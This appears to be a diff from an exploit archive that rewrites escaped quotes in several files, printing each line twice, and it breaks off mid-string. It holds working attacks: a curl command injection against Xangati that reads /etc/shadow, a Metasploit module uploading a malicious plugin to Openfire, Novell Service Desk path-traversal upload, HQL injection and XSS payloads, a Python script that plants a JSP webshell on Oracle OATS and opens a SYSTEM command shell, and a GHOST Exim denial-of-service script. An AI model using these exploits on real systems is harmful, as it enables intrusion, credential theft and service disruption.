while (read(fd, buf, 1) == 1) {
|
||||
if (buf[0] == \'\\n\') {
|
||||
buf[0] = \'\\0\';
|
||||
if (buf[0] == '\n') {
|
||||
buf[0] = '\0';
|
||||
return;
|
||||
}
|
||||
}
|
||||
perror(\"read\"); /* XXX */
|
||||
perror("read"); /* XXX */
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@ An attacker may leverage this issue to execute arbitrary commands in the context
|
|||
|
||||
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
|
||||
|
||||
curl -i -s -k -X \'POST\' \\
|
||||
-H \'Content-Type: application/x-www-form-urlencoded\' -H \'User-Agent: Java/1.7.0_25\' \\
|
||||
--data-binary $\'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\\\'cat\\\\x20/etc/shadow\\\';$CMD;+YES\' \\
|
||||
\'hxxps://www.example.com/servlet/Installer\'
|
||||
curl -i -s -k -X 'POST' \
|
||||
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
|
||||
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
|
||||
'hxxps://www.example.com/servlet/Installer'
|
||||
|
|
|
@ -5,8 +5,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require \'rex/zip\'
|
||||
require 'msf/core'
|
||||
require 'rex/zip'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Openfire Admin Console Authentication Bypass\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Openfire Admin Console Authentication Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability in the administration
|
||||
console of Openfire servers. By using this vulnerability it is possible to
|
||||
upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
|
||||
|
@ -29,102 +29,102 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
the server in some kind of unstable state, making re-exploitation difficult. You might
|
||||
want to do this manually.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'Andreas Kurtz\', # Vulnerability discovery
|
||||
\'h0ng10\' # Metasploit module
|
||||
'Andreas Kurtz', # Vulnerability discovery
|
||||
'h0ng10' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2008-6508\' ],
|
||||
[ \'OSVDB\', \'49663\' ],
|
||||
[ \'BID\', \'32189\' ],
|
||||
[ \'EDB\', \'7075\' ],
|
||||
[ \'URL\', \'http://community.igniterealtime.org/thread/35874\' ]
|
||||
[ 'CVE', '2008-6508' ],
|
||||
[ 'OSVDB', '49663' ],
|
||||
[ 'BID', '32189' ],
|
||||
[ 'EDB', '7075' ],
|
||||
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
|
||||
],
|
||||
\'DisclosureDate\' => \'Nov 10 2008\',
|
||||
\'Privileged\' => true,
|
||||
\'Platform\' => [\'java\', \'win\', \'linux\' ],
|
||||
\'Stance\' => Msf::Exploit::Stance::Aggressive,
|
||||
\'Targets\' =>
|
||||
'DisclosureDate' => 'Nov 10 2008',
|
||||
'Privileged' => true,
|
||||
'Platform' => ['java', 'win', 'linux' ],
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
[
|
||||
#
|
||||
# Java version
|
||||
#
|
||||
[ \'Java Universal\',
|
||||
[ 'Java Universal',
|
||||
{
|
||||
\'Arch\' => ARCH_JAVA,
|
||||
\'Platform\' => \'java\'
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'java'
|
||||
}
|
||||
],
|
||||
#
|
||||
# Platform specific targets
|
||||
#
|
||||
[ \'Windows x86 (Native Payload)\',
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
\'Platform\' => \'win\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ \'Linux x86 (Native Payload)\',
|
||||
[ 'Linux x86 (Native Payload)',
|
||||
{
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
]
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
'DefaultTarget' => 0,
|
||||
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(9090),
|
||||
OptString.new(\'TARGETURI\', [true, \'The base path to the web application\', \'/\']),
|
||||
OptString.new(\'PLUGINNAME\', [ false, \'Openfire plugin base name, (default: random)\' ]),
|
||||
OptString.new(\'PLUGINAUTHOR\',[ false, \'Openfire plugin author, (default: random)\' ]),
|
||||
OptString.new(\'PLUGINDESC\', [ false, \'Openfire plugin description, (default: random)\' ]),
|
||||
OptBool.new(\'REMOVE_PLUGIN\', [ false, \'Try to remove the plugin after installation\', false ]),
|
||||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
||||
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
|
||||
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
|
||||
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
|
||||
OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
path = \"#{base}login.jsp\"
|
||||
path = "#{base}login.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => path
|
||||
'uri' => path
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"Unable to make a request to: #{path}\")
|
||||
print_error("Unable to make a request to: #{path}")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
versioncheck = res.body =~ /Openfire, \\D*: (\\d)\\.(\\d).(\\d)\\s*<\\/div>/
|
||||
versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/
|
||||
|
||||
if versioncheck.nil? then
|
||||
print_error(\"Unable to detect Openfire version\")
|
||||
print_error("Unable to detect Openfire version")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
print_status(\"Detected version: #{$1}.#{$2}.#{$3}\")
|
||||
version = \"#{$1}#{$2}#{$3}\".to_i
|
||||
print_status("Detected version: #{$1}.#{$2}.#{$3}")
|
||||
version = "#{$1}#{$2}#{$3}".to_i
|
||||
|
||||
return Exploit::CheckCode::Safe if version > 360
|
||||
|
||||
# Just to be sure, try to access the log page
|
||||
path = \"#{base}setup/setup-/../../log.jsp\"
|
||||
path = "#{base}setup/setup-/../../log.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => path
|
||||
'uri' => path
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"Failed: Error requesting #{path}\")
|
||||
print_error("Failed: Error requesting #{path}")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
@ -133,83 +133,83 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def get_plugin_jar(plugin_name)
|
||||
files = [
|
||||
[ \"logo_large.gif\" ],
|
||||
[ \"logo_small.gif\" ],
|
||||
[ \"readme.html\" ],
|
||||
[ \"changelog.html\" ],
|
||||
[ \"lib\", \"plugin-metasploit.jar\" ]
|
||||
[ "logo_large.gif" ],
|
||||
[ "logo_small.gif" ],
|
||||
[ "readme.html" ],
|
||||
[ "changelog.html" ],
|
||||
[ "lib", "plugin-metasploit.jar" ]
|
||||
]
|
||||
|
||||
jar = Rex::Zip::Jar.new
|
||||
jar.add_files(files, File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\"))
|
||||
jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508"))
|
||||
|
||||
plugin_author = datastore[\'PLUGINAUTHOR\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_desc = datastore[\'PLUGINDESC\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8))
|
||||
|
||||
plugin_xml = File.open(File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2008-6508\", \"plugin.xml\"), \"rb\") {|fd| fd.read() }
|
||||
plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() }
|
||||
plugin_xml.gsub!(/PLUGINNAME/, plugin_name)
|
||||
plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
|
||||
plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
|
||||
|
||||
jar.add_file(\"plugin.xml\", plugin_xml)
|
||||
jar.add_file("plugin.xml", plugin_xml)
|
||||
|
||||
jar
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
plugin_name = datastore[\'PLUGINNAME\'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin = get_plugin_jar(plugin_name)
|
||||
|
||||
arch = target.arch
|
||||
plat = [Msf::Module::PlatformList.new(target[\'Platform\']).platforms[0]]
|
||||
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
|
||||
|
||||
if (p = exploit_regenerate_payload(plat, arch)) == nil
|
||||
print_error(\"Failed to regenerate payload\")
|
||||
print_error("Failed to regenerate payload")
|
||||
return
|
||||
end
|
||||
|
||||
plugin.add_file(\"lib/#{rand_text_alphanumeric(8)}.jar\", payload.encoded_jar.pack)
|
||||
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
|
||||
plugin.build_manifest
|
||||
|
||||
# Upload the plugin to the server
|
||||
print_status(\"Uploading plugin #{plugin_name} to the server\")
|
||||
print_status("Uploading plugin #{plugin_name} to the server")
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
||||
data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"uploadfile\\\"; \"
|
||||
data << \"filename=\\\"#{plugin_name}.jar\\\"\\r\\nContent-Type: application/java-archive\\r\\n\\r\\n\"
|
||||
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; "
|
||||
data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
|
||||
data << plugin.pack
|
||||
data << \"\\r\\n--#{boundary}--\"
|
||||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin\",
|
||||
\'method\' => \'POST\',
|
||||
\'data\' => data,
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
{
|
||||
\'Content-Type\' => \'multipart/form-data; boundary=\' + boundary,
|
||||
\'Content-Length\' => data.length,
|
||||
\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
|
||||
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
|
||||
'Content-Length' => data.length,
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
print_error(\"Warning: got no response from the upload, continuing...\") if !res
|
||||
print_error("Warning: got no response from the upload, continuing...") if !res
|
||||
|
||||
# Delete the uploaded JAR file
|
||||
if datastore[\'REMOVE_PLUGIN\']
|
||||
print_status(\"Deleting plugin #{plugin_name} from the server\")
|
||||
if datastore['REMOVE_PLUGIN']
|
||||
print_status("Deleting plugin #{plugin_name} from the server")
|
||||
res = send_request_cgi({
|
||||
\'uri\' => \"#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}\",
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"JSESSIONID=#{rand_text_numeric(13)}\",
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
})
|
||||
if not res
|
||||
print_error(\"Error deleting the plugin #{plugin_name}. You might want to do this manually.\")
|
||||
print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,11 +4,11 @@
|
|||
Disclosure: 30/03/2016 / Last updated: 10/04/2016
|
||||
|
||||
>> Background on the affected products:
|
||||
\"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians\"
|
||||
"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
|
||||
|
||||
|
||||
>> Summary:
|
||||
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:\"LiveTime/WebObjects\". Version 7.2 and above now appear to be branded as \"Micro Focus Service Desk\".
|
||||
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk".
|
||||
Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
|
||||
|
||||
|
||||
|
@ -32,7 +32,7 @@ Content-Type: multipart/form-data; boundary=---------------------------247747071
|
|||
Content-Length: 533
|
||||
|
||||
-----------------------------2477470717121
|
||||
Content-Disposition: form-data; name=\"0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23\"; filename=\"../../srv/tomcat6/webapps/LiveTime/bla5.jsp\"
|
||||
Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<HTML>
|
||||
|
@ -45,7 +45,7 @@ Content-Type: application/octet-stream
|
|||
</BODY>
|
||||
</HTML>
|
||||
-----------------------------2477470717121
|
||||
Content-Disposition: form-data; name=\"ButtonUpload\"
|
||||
Content-Disposition: form-data; name="ButtonUpload"
|
||||
|
||||
Upload
|
||||
-----------------------------2477470717121--
|
||||
|
@ -102,7 +102,7 @@ Affected versions:
|
|||
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
|
||||
|
||||
Input is passed directly to Hibernate (line 125 of DownloadAction.class):
|
||||
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append(\"from \").append(hasEn).append(\" as attach where attach.attachmentId = \").append(hasId.intValue()).toString()).list();
|
||||
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
|
||||
|
||||
hasEn is entityName (string) and hasId is attachmentId (integer)
|
||||
|
||||
|
@ -123,7 +123,7 @@ a)
|
|||
In the customer portal, clicking the user name will allow you to edit your display name.
|
||||
The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
|
||||
Example:
|
||||
tf_aClientFirstName=Jos\"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName=\"><script>alert(2)</script>Guestaa
|
||||
tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
|
||||
|
||||
This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
|
||||
|
||||
|
@ -131,7 +131,7 @@ b)
|
|||
In the Forums the content section is vulnerable when creating a new topic.
|
||||
The affected parameter is ta_selectedTopicContent.
|
||||
Example:
|
||||
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent=\"><script>alert(2)</script>&ButtonSave=Save
|
||||
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
|
||||
|
||||
The alert box will pop up when you view the topic.
|
||||
|
||||
|
@ -141,16 +141,16 @@ Example:
|
|||
POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
|
||||
|
||||
-----------------------------3162880314525
|
||||
Content-Disposition: form-data; name=\"tf_orgUnitName\"
|
||||
Content-Disposition: form-data; name="tf_orgUnitName"
|
||||
|
||||
\"><script>alert(1)</script>
|
||||
"><script>alert(1)</script>
|
||||
|
||||
The alert box will pop up when you view the Organizational Units page and possibly in other pages.
|
||||
|
||||
d)
|
||||
In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
|
||||
Example:
|
||||
tf_aManufacturerFullName=\"><script>alert(1)</script>&tf_aManufacturerName=\"><script>alert(1)</script>&tf_aManufacturerAddress=\"><script>alert(1)</script>&tf_aManufacturerCity=\"><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
|
||||
tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
|
||||
|
||||
Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
|
||||
|
||||
|
|
|
@ -9,19 +9,19 @@
|
|||
import urllib2
|
||||
import urllib
|
||||
|
||||
ip = \'192.168.150.239\'
|
||||
ip = '192.168.150.239'
|
||||
port = 8088
|
||||
|
||||
url = \"http://\" + ip + \":\" + str(port)
|
||||
url = "http://" + ip + ":" + str(port)
|
||||
#bypass authentication
|
||||
url = url+\"/olt/Login.do/../../olt/UploadFileUpload.do\"
|
||||
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
|
||||
request = urllib2.Request(url)
|
||||
|
||||
webshell_content=\'\'\'
|
||||
<%@ page import=\"java.util.*,java.io.*\" %>
|
||||
webshell_content='''
|
||||
<%@ page import="java.util.*,java.io.*" %>
|
||||
<%
|
||||
if (request.getParameter(\"{cmd}\") != null) {{
|
||||
Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"{cmd}\"));
|
||||
if (request.getParameter("{cmd}") != null) {{
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
|
@ -32,65 +32,65 @@ webshell_content=\'\'\'
|
|||
}}
|
||||
}}
|
||||
%>
|
||||
\'\'\'
|
||||
boundary = \"---------------------------7e01e2240a1e\"
|
||||
request.add_header(\'Content-Type\', \"multipart/form-data; boundary=\" + boundary)
|
||||
post_data = \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.extension\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n.jsp\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName1\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\nwebshell.jsp\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName2\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName3\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileName4\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"fileType\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n*\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"file1\\\"; filename=\\\"webshell.jsp\\\"\\r\\n\"
|
||||
post_data = post_data + \"Content-Type: text/plain\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\" + webshell_content +\"\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.repository\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\nDefault\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"storage.workspace\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n.\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"\\r\\n\"
|
||||
post_data = post_data + \"Content-Disposition: form-data; name=\\\"directory\\\"\\r\\n\"
|
||||
post_data = post_data + \"\\r\\n\" + \"../oats\\servers\\AdminServer\\\\tmp\\_WL_user\\oats_ee\\\\1ryhnd\\war\\pages\" +\"\\r\\n\"
|
||||
post_data = post_data + \"--\" + boundary + \"--\"+\"\\r\\n\"
|
||||
'''
|
||||
boundary = "---------------------------7e01e2240a1e"
|
||||
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
|
||||
post_data = "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
|
||||
post_data = post_data + "\r\n.jsp\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
|
||||
post_data = post_data + "\r\nwebshell.jsp\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
|
||||
post_data = post_data + "\r\n\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
|
||||
post_data = post_data + "\r\n*\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
|
||||
post_data = post_data + "Content-Type: text/plain\r\n"
|
||||
post_data = post_data + "\r\n" + webshell_content +"\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
|
||||
post_data = post_data + "\r\nDefault\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
|
||||
post_data = post_data + "\r\n.\r\n"
|
||||
post_data = post_data + "--" + boundary + "\r\n"
|
||||
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
|
||||
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
|
||||
post_data = post_data + "--" + boundary + "--"+"\r\n"
|
||||
|
||||
try:
|
||||
request.add_data(post_data)
|
||||
response = urllib2.urlopen(request)
|
||||
if response.code == 200 :
|
||||
print \"[+]upload done!\"
|
||||
webshellurl = \"http://\" + ip + \":\" + str(port) + \"/olt/pages/webshell.jsp\"
|
||||
print \"[+]wait a moment,detecting whether the webshell exists...\"
|
||||
print "[+]upload done!"
|
||||
webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
|
||||
print "[+]wait a moment,detecting whether the webshell exists..."
|
||||
if urllib2.urlopen(webshellurl).code == 200 :
|
||||
print \"[+]upload webshell successfully!\"
|
||||
print \"[+]return a cmd shell\"
|
||||
print "[+]upload webshell successfully!"
|
||||
print "[+]return a cmd shell"
|
||||
while True:
|
||||
cmd = raw_input(\">>: \")
|
||||
if cmd == \"exit\" :
|
||||
cmd = raw_input(">>: ")
|
||||
if cmd == "exit" :
|
||||
break
|
||||
print urllib.urlopen(webshellurl+\"?{cmd}=\" + cmd).read().lstrip()
|
||||
print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
|
||||
else:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
else:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
except Exception as e:
|
||||
print \"[-]attack fail!\"
|
||||
print "[-]attack fail!"
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
#run the exploit and get a cmd shell
|
||||
root@kali:~/Desktop# python exploit.py
|
||||
[+]upload done!
|
||||
|
@ -98,10 +98,10 @@ root@kali:~/Desktop# python exploit.py
|
|||
[+]upload webshell successfully!
|
||||
[+]return a cmd shell
|
||||
>>: whoami
|
||||
nt authority\\system
|
||||
nt authority\system
|
||||
|
||||
|
||||
>>: exit
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
#
|
||||
# USAGE: python ghost-smtp-dos.py <ip> <port>
|
||||
#
|
||||
# Escape character is \'^]\'.
|
||||
# Escape character is '^]'.
|
||||
# 220 debian-7-7-64b ESMTP Exim 4.80 ...
|
||||
# HELO
|
||||
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
|
@ -33,28 +33,28 @@ def main(argv):
|
|||
argc = len(argv)
|
||||
|
||||
if argc <= 1:
|
||||
print \"usage: %s <host>\" % (argv[0])
|
||||
print "usage: %s <host>" % (argv[0])
|
||||
sys.exit(0)
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"
|
||||
